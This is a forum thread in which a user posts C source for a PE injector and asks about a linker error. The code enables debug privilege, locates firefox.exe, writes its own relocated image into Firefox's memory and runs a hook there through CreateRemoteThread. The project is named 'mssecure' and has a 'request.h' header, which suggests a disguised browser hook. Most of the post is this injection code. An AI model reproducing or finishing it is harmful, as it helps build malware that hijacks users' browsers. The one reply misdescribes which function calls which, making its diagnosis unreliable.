Hannock Posted May 19, 2017 Report Posted May 19, 2017 So Good Morning, I Coded a PE Injector last time, after several hicks however i managed to get it to work. Now i have managed to make a C Program, nw i want to make use of another C++ program inside a C PE injector , unfortunately i get this kind of Error Quote 1>------ Build started: Project: mssecure, Configuration: Debug Win32 ------ 1> main.c 1> FFInject.c 1>c:\users\XXXXXXXX\documents\visual studio 2013\projects\mssecure\mssecure\ffinject.c(20): warning C4101: 'dwSize' : unreferenced local variable 1> Generating Code... 1>FFInject.obj : error LNK2019: unresolved external symbol "void __cdecl setFFHook(void)" (?setFFHook@@YAXXZ) referenced in function "unsigned long __stdcall ThreadProcFF(void)" (?ThreadProcFF@@YGKXZ) 1>C:\Users\XXXXXXXX\Documents\Visual Studio 2013\Projects\mssecure\Debug\mssecure.exe : fatal error LNK1120: 1 unresolved externals ========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ========== Source code Looks like this #include <stdio.h> #include <stdlib.h> #include <Windows.h> #include <tlhelp32.h> #include <string.h> #include "FFInject.h" #include "request.h" #include "FFhook.h" DWORD WINAPI ThreadProcFF() { setFFHook(); return 0; } BOOL SetDebugPriviledge(BOOL State) { HANDLE hToken; TOKEN_PRIVILEGES tp; DWORD dwSize; ZeroMemory(&tp, sizeof(tp)); tp.PrivilegeCount = 1; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) { return FALSE; } if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) { CloseHandle(hToken); } if (State) { tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; } else { tp.Privileges[0].Attributes = SE_PRIVILEGE_REMOVED; } if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL)) { CloseHandle(hToken); } return CloseHandle(hToken); } DWORD MyGetProcessId(LPCTSTR ProcessName) { PROCESSENTRY32 pt; HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); if (Process32First(hsnap, &pt)) { do { if (!lstrcmpi(pt.szExeFile, ProcessName)) { CloseHandle(hsnap); return pt.th32ProcessID; } } while (Process32Next(hsnap, &pt)); } CloseHandle(hsnap); return 0; } void InjectFF() { DWORD pid = MyGetProcessId(TEXT("firefox.exe")); PIMAGE_DOS_HEADER pIDH; PIMAGE_NT_HEADERS pINH; PIMAGE_BASE_RELOCATION pIBR; HANDLE hProcess, hThread; PUSHORT TypeOffset; PVOID ImageBase, Buffer, mem; ULONG i, Count, Delta, *p; hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid); if (!hProcess) { printf("\nError: Unable to open target process (%u)\n", GetLastError()); //return -1; //getchar(); } ImageBase = GetModuleHandle(NULL); pIDH = (PIMAGE_DOS_HEADER)ImageBase; pINH = (PIMAGE_NT_HEADERS)((PUCHAR)ImageBase + pIDH->e_lfanew); mem = VirtualAllocEx(hProcess, NULL, pINH->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!mem) { printf("\nError: Unable to allocate memory in target process (%u)\n", GetLastError()); CloseHandle(hProcess); getchar(); //return 0; } Buffer = VirtualAlloc(NULL, pINH->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); memcpy(Buffer, ImageBase, pINH->OptionalHeader.SizeOfImage); pIBR = (PIMAGE_BASE_RELOCATION)((PUCHAR)Buffer + pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); Delta = (ULONG)mem - (ULONG)ImageBase; while (pIBR->VirtualAddress) { if (pIBR->SizeOfBlock >= sizeof(IMAGE_BASE_RELOCATION)) { Count = (pIBR->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(USHORT); TypeOffset = (PUSHORT)(pIBR + 1); for (i = 0; i<Count; i++) { if (TypeOffset[i]) { p = (PULONG)((PUCHAR)Buffer + pIBR->VirtualAddress + (TypeOffset[i] & 0xFFF)); *p += Delta; } } } pIBR = (PIMAGE_BASE_RELOCATION)((PUCHAR)pIBR + pIBR->SizeOfBlock); } if (!WriteProcessMemory(hProcess, mem, Buffer, pINH->OptionalHeader.SizeOfImage, NULL)) { printf("\nError: Unable to write process memory (%u)\n", GetLastError()); VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE); CloseHandle(hProcess); getchar(); //return -1; } VirtualFree(Buffer, 0, MEM_RELEASE); hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)((PUCHAR)ThreadProcFF + Delta), NULL, 0, NULL); if (!hThread) { printf("\nError: Unable to create thread in target process (%u)\n", GetLastError()); VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE); CloseHandle(hProcess); //return -1; getchar(); } WaitForSingleObject(hThread, INFINITE); VirtualFreeEx(hProcess, mem, 0, MEM_RELEASE); CloseHandle(hProcess); } What do i seem to get wrongly here? The code in the Hook (setFFHook) is supposed to show Hello i am inside Firefox Quote
u0m3 Posted May 19, 2017 Report Posted May 19, 2017 It's a linking error. It's quite self-explanatory: in setFFHook you make a call to ThreadProcFF that the linker does not know where to... well link. It does not know what library contains it. Quote
